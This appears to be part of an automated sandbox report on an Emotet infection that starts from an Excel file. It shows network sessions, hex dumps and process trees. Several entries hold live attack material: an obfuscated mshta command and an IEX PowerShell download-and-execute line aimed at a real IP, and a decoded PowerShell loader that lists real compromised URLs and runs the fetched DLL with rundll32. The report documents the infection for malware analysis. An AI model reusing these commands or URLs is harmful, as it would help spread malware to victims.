Jan 28, 2022 21:29:59.736351967 CET	9	IN	Data Raw: 6c 65 25 32 38 25 35 46 25 33 31 25 32 42 25 32 42 25 33 43 25 36 43 25 33 38 25 32 39 25 33 42 25 37 36 25 36 31 72 25 32 30 5c 31 35 34 25 33 31 25 33 44 6e 25 36 35 5c 31 36 37 25 32 30 41 5c 31 36 32 25 37 32 61 5c 31 37 31 25 32 38 25 32 39 Data Ascii: le%28%5F%31%2B%2B%3C%6C%38%29%3B%76%61r%20\154%31%3Dn%65\167%20A\162%72a\171%28%29%2Cl%30%3Dne\167%20%41r%72\141\171%28%29%2C%49%6C%3D%31%32%38%3B%64o%7B\154%30%5BIl%5D%3D\123tr\151ng%2E%66%72o%6D\103%68\141r\103%6F\144%65%28I\154%29%7D%77h%69
Jan 28, 2022 21:29:59.736371994 CET	10	IN	Data Raw: 12 7f 3d 73 7e 7f 7b 6d 67 7e 2f 78 23 7f 74 6c 1c 76 29 6c 1e 6d 7b 6c 21 73 2c 7f 69 7f 72 78 4a 6e 7d 70 3e 6c 10 6e 30 6c 13 72 04 6c 28 6e 7a 6d 1b 6e 3f 6d 07 6c 2f 7f 66 6c 37 6c 24 6c 13 72 0b 6c 3c 77 2b 6d 01 74 04 6e 49 6d 68 6c 2b 6c Data Ascii: =s~{mg~/x#tlv)lm{l!s,irxJn}p>ln0lrl(nzmn?ml/fl7l$lrl<w+mtnImhl+l-vKlAl1}v9Sixsp>oVm\ro1uunYmWtIr(jsKx$o=y\'nJ~.zjtLu/dqkDncluiofott%o&l&sKo=s(}o"s,s.s0s2s4(lfo?fx0ptr25+\|3nTmxw{lzks,ks?k\nd*oos
Jan 28, 2022 21:29:59.736409903 CET	11	IN	Data Raw: 36 7f 6e 67 38 69 57 68 2d 7f 20 67 20 68 67 67 3c 7f 20 69 55 67 3f 7f 47 67 24 67 20 67 10 69 33 7f 57 7f 53 69 57 73 30 73 3f 7f 38 7f 37 7f 29 7f 20 7f 26 67 40 6a 42 7f 28 7f 38 72 0b 67 3f 7f 22 73 76 67 3f 6c 7c 69 3a 78 68 6c 34 78 0e 7f Data Ascii: 6ng8iWh- g hgg< iUg?Gg$g gi3WSiWs0s?87) &g@jB(8rg?"svg?l\|i:xhl4x.~>iu.g?gKgTgVgQgez/4gOg "xf~}i3odw~atsw)x>ClehFjhJojgH)i3cfvgJgSge49gOghgSffgRs?sEy}gPf(ff\nffffsgefff\rfffgNfgSz/s~+gi\|f&s?s
Jan 28, 2022 21:29:59.736426115 CET	12	IN	Data Raw: 6a 5a 4f 59 74 52 6f 62 78 69 76 58 27 20 20 20 3b 6c 38 38 44 31 37 71 33 66 66 4e 32 45 48 31 6f 20 20 28 63 45 37 62 37 59 37 6f 59 6b 44 51 29 3b 72 51 54 75 32 35 20 20 20 28 63 45 37 62 37 59 37 6f 59 6b 44 51 29 3b 66 66 4e 32 45 48 31 6f Data Ascii: jZOYtRobxivX' ;l88D17q3ffN2EH1o (cE7b7Y7oYkDQ);rQTu25 (cE7b7Y7oYkDQ);ffN2EH1ol88D17q3 (pu7DWKhm);iOtJeS75w1W8='w59ln681IRbBSO08N0WOgHv7vQ' ;eval(unescape('%71%79%36%28%22%63%37%39%38%66%62%36%39%66%22%29%3B'));x6175kyrRnBGJqV+='ppVsr

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.22	49166	91.240.118.168	80	C:\Windows\System32\mshta.exe

Timestamp	kBytes transferred	Direction	Data
Jan 28, 2022 21:30:05.283601046 CET	12	OUT	GET /vvv/ppp/fe.png HTTP/1.1 Host: 91.240.118.168 Connection: Keep-Alive
Jan 28, 2022 21:30:05.342173100 CET	14	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 28 Jan 2022 20:30:05 GMT Content-Type: image/png Content-Length: 1153 Last-Modified: Thu, 27 Jan 2022 20:39:27 GMT Connection: keep-alive ETag: "61f302ff-481" Accept-Ranges: bytes Data Raw: 24 70 61 74 68 20 3d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 51 57 45 52 2e 64 6c 6c 22 3b 0d 0a 24 75 72 6c 31 20 3d 20 27 68 74 74 70 3a 2f 2f 61 79 6f 6f 62 65 64 75 63 61 74 69 6f 6e 61 6c 74 72 75 73 74 2e 69 6e 2f 63 6d 73 2f 4c 6d 4f 4f 65 44 6e 4e 6f 30 64 68 34 76 6b 4e 2f 27 3b 0d 0a 24 75 72 6c 32 20 3d 20 27 68 74 74 70 3a 2f 2f 6c 79 6e 73 6d 69 74 68 67 72 6f 75 70 2e 63 6f 6d 2f 68 66 74 6d 32 69 32 2f 4b 5a 49 46 77 6a 6d 77 57 49 31 73 79 2f 27 3b 0d 0a 24 75 72 6c 33 20 3d 20 27 68 74 74 70 3a 2f 2f 63 75 72 76 79 67 69 72 6c 73 62 6f 75 74 69 71 75 65 2e 63 6f 6d 2f 6a 66 65 72 74 6c 2f 47 65 34 39 7a 63 49 7a 62 38 4b 57 77 58 46 46 6b 2f 27 3b 0d 0a 24 75 72 6c 34 20 3d 20 27 68 74 74 70 3a 2f 2f 74 68 65 73 6f 63 69 61 6c 61 67 65 6e 74 2e 6e 65 74 2f 62 2f 4d 4f 35 41 4b 71 4a 39 54 79 39 6c 45 2f 27 3b 0d 0a 24 75 72 6c 35 20 3d 20 27 68 74 74 70 3a 2f 2f 62 61 77 65 6c 6e 69 61 6e 6b 61 2e 63 66 6f 6c 6b 73 2e 70 6c 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 54 74 76 2f 27 3b 0d 0a 24 75 72 6c 36 20 3d 20 27 68 74 74 70 3a 2f 2f 74 65 73 74 2e 64 72 65 61 6d 63 69 74 79 6f 72 6c 61 6e 64 6f 2e 63 6f 6d 2f 74 30 6d 6d 78 2f 78 42 42 58 69 2f 27 3b 0d 0a 24 75 72 6c 37 20 3d 20 27 68 74 74 70 3a 2f 2f 68 75 63 75 6c 65 6b 2e 66 75 74 75 72 65 68 6f 73 74 2e 70 6c 2f 69 6d 61 67 65 73 2f 36 44 62 62 6d 6f 36 78 45 51 44 44 2f 27 3b 0d 0a 24 75 72 6c 38 20 3d 20 27 68 74 74 70 3a 2f 2f 74 65 73 74 2e 76 61 6c 65 73 74 75 64 69 6f 73 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 61 50 76 57 37 41 70 4e 62 52 59 34 5a 47 50 2f 27 3b 0d 0a 24 75 72 6c 39 20 3d 20 27 68 74 74 70 3a 2f 2f 63 72 6d 2e 63 6f 6d 70 72 61 63 61 73 61 65 6e 68 6f 75 73 74 6f 6e 2e 63 6f 6d 2f 68 73 34 64 38 61 2f 63 30 73 31 33 49 2f 27 3b 0d 0a 24 75 72 6c 31 30 20 3d 20 27 68 74 74 70 3a 2f 2f 73 65 6c 6c 69 6e 2e 61 70 70 2f 77 70 2d 61 64 6d 69 6e 2f 53 32 63 44 50 59 58 4e 4b 45 6e 54 2f 27 3b 0d 0a 24 75 72 6c 31 31 20 3d 20 27 68 74 74 70 3a 2f 2f 63 6d 69 74 2e 76 61 6c 65 73 74 75 64 69 6f 73 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 52 75 65 47 4a 34 31 41 2f 27 3b 0d 0a 0d 0a 24 77 65 62 20 3d 20 4e 65 77 2d 4f 62 6a 65 63 74 20 6e 65 74 2e 77 65 62 63 6c 69 65 6e 74 3b 0d 0a 24 75 72 6c 73 20 3d 20 22 24 75 72 6c 31 2c 24 75 72 6c 32 2c 24 75 72 6c 33 2c 24 75 72 6c 34 2c 24 75 72 6c 35 2c 24 75 72 6c 36 2c 24 75 72 6c 37 2c 24 75 72 6c 38 2c 24 75 72 6c 39 2c 24 75 72 6c 31 30 2c 24 75 72 6c 31 31 22 2e 73 70 6c 69 74 28 22 2c 22 29 3b 0d 0a 66 6f 72 65 61 63 68 20 28 24 75 72 6c 20 69 6e 20 24 75 72 6c 73 29 20 7b 0d 0a 20 20 20 74 72 79 20 7b 0d 0a 20 20 20 20 20 20 20 24 77 65 62 2e 44 6f 77 6e 6c 6f 61 64 46 69 6c 65 28 24 75 72 6c 2c 20 24 70 61 74 68 29 3b 0d 0a 20 20 20 20 20 20 20 69 66 20 28 28 47 65 74 2d 49 74 65 6d 20 24 70 61 74 68 29 2e 4c 65 6e 67 74 68 20 2d 67 65 20 33 30 30 30 30 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 5b 44 69 61 67 6e 6f 73 74 69 63 73 2e 50 72 6f 63 65 73 73 5d 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 62 72 65 61 6b 3b 0d 0a 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 7d 0d 0a 20 20 20 63 61 74 63 68 7b 7d 0d 0a 7d 20 0d 0a 53 6c 65 65 70 20 2d 73 20 34 3b 63 6d 64 20 2f 63 20 43 3a 5c 57 69 6e 64 6f 77 73 5c 53 79 73 57 6f 77 36 34 5c 72 75 6e 64 6c 6c 33 32 2e 65 78 65 20 27 43 3a Data Ascii: $path = "C:\ProgramData\QWER.dll";$url1 = 'http://ayoobeducationaltrust.in/cms/LmOOeDnNo0dh4vkN/';$url2 = 'http://lynsmithgroup.com/hftm2i2/KZIFwjmwWI1sy/';$url3 = 'http://curvygirlsboutique.com/jfertl/Ge49zcIzb8KWwXFFk/';$url4 = 'http://thesocialagent.net/b/MO5AKqJ9Ty9lE/';$url5 = 'http://bawelnianka.cfolks.pl/wp-content/Ttv/';$url6 = 'http://test.dreamcityorlando.com/t0mmx/xBBXi/';$url7 = 'http://huculek.futurehost.pl/images/6Dbbmo6xEQDD/';$url8 = 'http://test.valestudios.com/wp-content/aPvW7ApNbRY4ZGP/';$url9 = 'http://crm.compracasaenhouston.com/hs4d8a/c0s13I/';$url10 = 'http://sellin.app/wp-admin/S2cDPYXNKEnT/';$url11 = 'http://cmit.valestudios.com/wp-admin/RueGJ41A/';$web = New-Object net.webclient;$urls = "$url1,$url2,$url3,$url4,$url5,$url6,$url7,$url8,$url9,$url10,$url11".split(",");foreach ($url in $urls) { try { $web.DownloadFile($url, $path); if ((Get-Item $path).Length -ge 30000) { [Diagnostics.Process]; break; } } catch{}} Sleep -s 4;cmd /c C:\Windows\SysWow64\rundll32.exe 'C:
Jan 28, 2022 21:30:05.342190027 CET	14	IN	Data Raw: 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 51 57 45 52 2e 64 6c 6c 27 2c 42 42 44 44 3b 0d 0a 0d 0a 20 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 20 Data Ascii: \ProgramData\QWER.dll',BBDD;

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.22	49167	139.59.58.214	80	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
Jan 28, 2022 21:30:06.070625067 CET	15	OUT	GET /cms/LmOOeDnNo0dh4vkN/ HTTP/1.1 Host: ayoobeducationaltrust.in Connection: Keep-Alive
Jan 28, 2022 21:30:06.391297102 CET	16	IN	HTTP/1.1 200 OK Date: Fri, 28 Jan 2022 20:28:51 GMT Server: Apache Set-Cookie: 61f4520308e3e=1643401731; expires=Fri, 28-Jan-2022 20:29:51 GMT; Max-Age=60; path=/ Cache-Control: no-cache, must-revalidate Pragma: no-cache Last-Modified: Fri, 28 Jan 2022 20:28:51 GMT Expires: Fri, 28 Jan 2022 20:28:51 GMT Content-Disposition: attachment; filename="xfm.dll" Content-Transfer-Encoding: binary Content-Length: 548864 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 68 73 c2 61 2c 12 ac 32 2c 12 ac 32 2c 12 ac 32 ef 1d f3 32 26 12 ac 32 ef 1d f1 32 37 12 ac 32 2c 12 ad 32 0e 10 ac 32 0b d4 d1 32 36 12 ac 32 0b d4 c1 32 a6 12 ac 32 0b d4 c2 32 b2 12 ac 32 0b d4 d6 32 2d 12 ac 32 0b d4 d0 32 2d 12 ac 32 0b d4 d4 32 2d 12 ac 32 52 69 63 68 2c 12 ac 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 3e fa f3 61 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 50 04 00 00 00 04 00 00 00 00 00 06 0d 03 00 00 10 00 00 00 60 04 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 08 00 00 10 00 00 98 df 08 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 2d 05 00 52 00 00 00 34 10 05 00 04 01 00 00 00 a0 05 00 50 56 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 30 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 bd 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 60 04 00 94 05 00 00 ac 0f 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 39 45 04 00 00 10 00 00 00 50 04 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 92 cd 00 00 00 60 04 00 00 d0 00 00 00 60 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 80 65 00 00 00 30 05 00 00 30 00 00 00 30 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 56 02 00 00 a0 05 00 00 60 02 00 00 60 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 62 93 00 00 00 00 08 00 00 a0 00 00 00 c0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$hsa,2,2,22&2272,2226222222-22-22-2Rich,2PEL>a!P`@-R4PV0N@`@.text9EP `.rdata``@@.datae000@.rsrcPV``@@.relocb@B
Jan 28, 2022 21:30:06.391338110 CET	17	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Jan 28, 2022 21:30:06.391362906 CET	19	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Jan 28, 2022 21:30:06.391386986 CET	20	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Jan 28, 2022 21:30:06.391411066 CET	21	IN	Data Raw: 8b 45 fc 8b 08 8b 55 fc 8b 02 8b 11 8b c8 8b 42 04 ff d0 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 89 4d fc 8b 45 fc 8b 00 83 e8 10 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 89 4d fc 6a 00 6a 64 8b 4d fc e8 Data Ascii: EUB]UQME]UQMjjdMlYEdhE]UQMEPM"]UQM]Ui]Ujh>dPQE3PEdMEPjfMXEM
Jan 28, 2022 21:30:06.391434908 CET	23	IN	Data Raw: 45 0c 89 45 f8 8b 4d 08 89 4d fc c7 45 f4 00 00 00 00 eb 09 8b 55 f4 83 c2 01 89 55 f4 8b 45 f4 3b 45 10 73 12 8b 4d fc 03 4d f4 8b 55 f8 03 55 f4 8a 02 88 01 eb dd 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 7d 08 00 74 11 Data Ascii: EEMMEUUE;EsMMUU]U}thjEPb]UQjh0EPjbEE]U}tEPEM;MrE>URE}t&}t EPMQURE
Jan 28, 2022 21:30:06.391458988 CET	24	IN	Data Raw: e8 01 f7 d0 23 45 dc 89 45 d8 8b 4d e4 51 8b 55 08 52 8b 4d d4 e8 b5 fd ff ff 89 45 e0 8b 45 ec 3b 45 d8 74 0b 8b 4d e8 03 4d f0 3b 4d d8 76 48 8b 55 e4 8b 42 24 25 00 00 00 02 74 0b 8b 4d f4 81 e1 00 00 00 02 75 13 8b 55 e4 8b 45 f4 0b 42 24 25 Data Ascii: #EEMQURMEE;EtMM;MvHUB$%tMuUEB$%EMUQ$UEE+EETMQURMu3DEEMMUUEH$MEUREPMhu3]UMEHMU
Jan 28, 2022 21:30:06.391485929 CET	26	IN	Data Raw: bc 00 00 00 00 c7 45 f0 00 00 00 00 6a 40 8b 45 0c 50 8b 4d a0 e8 eb f6 ff ff 85 c0 75 07 33 c0 e9 ea 03 00 00 8b 4d 08 89 4d f4 8b 55 f4 0f b7 02 3d 4d 5a 00 00 74 12 68 c1 00 00 00 ff 15 b8 62 04 10 33 c0 e9 c5 03 00 00 8b 4d f4 8b 51 3c 81 c2 Data Ascii: Ej@EPMu3MMU=MZthb3MQ<REPMu3MUQ<UE8PEthb3xMQLthb3WEH8thb3:UBMTUEH8ME
Jan 28, 2022 21:30:06.391510963 CET	27	IN	Data Raw: 8b 45 fc 8b 4d e8 3b 48 18 73 2d 8b 55 e4 8b 45 f0 03 02 50 8b 4d 0c 51 e8 3e f1 ff ff 83 c4 08 85 c0 75 12 8b 55 e0 0f b7 02 89 45 f8 c7 45 ec 01 00 00 00 eb 02 eb ad 83 7d ec 00 75 0c 6a 7f ff 15 b8 62 04 10 33 c0 eb 29 8b 4d fc 8b 55 f8 3b 51 Data Ascii: EM;Hs-UEPMQ>uUEE}ujb3)MU;Qvjb3EMHUE]UMEE}uMytUMQP(UjjEHQUUzt\EEEMU;Q}0EHU<t
Jan 28, 2022 21:30:06.391532898 CET	28	IN	Data Raw: 30 05 10 03 d1 03 15 c4 30 05 10 8b 0d c4 30 05 10 0f af 0d b8 30 05 10 03 d1 2b 15 bc 30 05 10 8b 0d c8 30 05 10 0f af 0d c4 30 05 10 0f af 0d c8 30 05 10 03 d1 8b 0d c8 30 05 10 0f af 0d c4 30 05 10 2b d1 2b 15 c8 30 05 10 2b 15 c4 30 05 10 8b Data Ascii: 0000+000000++0+0000000+000000++0+0000000+000
Jan 28, 2022 21:30:06.704612017 CET	30	IN	Data Raw: 05 10 03 ca 2b 0d c8 30 05 10 a1 c4 30 05 10 0f af 05 c0 30 05 10 0f af 05 c8 30 05 10 2b c8 8b 15 c4 30 05 10 0f af 15 b8 30 05 10 2b ca a1 bc 30 05 10 0f af 05 c8 30 05 10 0f af 05 b8 30 05 10 2b c8 2b 0d c8 30 05 10 8b 15 bc 30 05 10 0f af 15 Data Ascii: +0000+00+000++00000++00+000+00+0+000+0000+00+000++0

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXEPID: 2232, Parent PID: 596

General

Target ID:	0
Start time:	21:29:20
Start date:	28/01/2022
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Imagebase:	0x13f410000
File size:	28253536 bytes
MD5 hash:	D53B85E21886D2AF9815C377537BCAC3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 1760, Parent PID: 2232

General

Target ID:	2
Start time:	21:29:22
Start date:	28/01/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	CMD.EXE /c ms^hta http://91.2^40.118.1^68/vvv/ppp/f^e.ht^m^l
Imagebase:	0x4abd0000
File size:	345088 bytes
MD5 hash:	5746BD7E255DD6A8AFA06F7C42C1BA41
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: mshta.exePID: 2840, Parent PID: 1760

General

Target ID:	4
Start time:	21:29:23
Start date:	28/01/2022
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	mshta http://91.240.118.168/vvv/ppp/fe.html
Imagebase:	0x13f1b0000
File size:	13824 bytes
MD5 hash:	95828D670CFD3B16EE188168E083C3C5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 3004, Parent PID: 2840

General

Target ID:	6
Start time:	21:29:26
Start date:	28/01/2022
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/vvv/ppp/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI\|I`E`X
Imagebase:	0x13fba0000
File size:	473600 bytes
MD5 hash:	852D67A27E454BD389FA7F02A8CBE23F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 2852, Parent PID: 3004

General

Target ID:	8
Start time:	21:29:38
Start date:	28/01/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll BBDD
Imagebase:	0x4abd0000
File size:	345088 bytes
MD5 hash:	5746BD7E255DD6A8AFA06F7C42C1BA41
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 1180, Parent PID: 2852

General

Target ID:	9
Start time:	21:29:39
Start date:	28/01/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll BBDD
Imagebase:	0xc00000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.460063482.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 2656, Parent PID: 1180

General

Target ID:	10
Start time:	21:29:42
Start date:	28/01/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer
Imagebase:	0xc00000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.512416856.0000000002F40000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.512269279.0000000002820000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.511939105.0000000000441000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.511964806.0000000000470000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.512350669.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.512137672.0000000000AE1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.511829011.00000000001E1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.511865871.0000000000310000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.511778687.0000000000170000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.512384350.0000000002E81000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.512450327.0000000003021000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.512203615.0000000000BD1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.512323278.0000000002DD1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.512502215.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.512166505.0000000000B10000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 1532, Parent PID: 2656

General

Target ID:	11
Start time:	21:30:04
Start date:	28/01/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Bwqooqqzlaw\cojfo.cqz",OOkfVaPZ
Imagebase:	0xc00000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.514931269.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.514649253.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.514700543.0000000000201000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
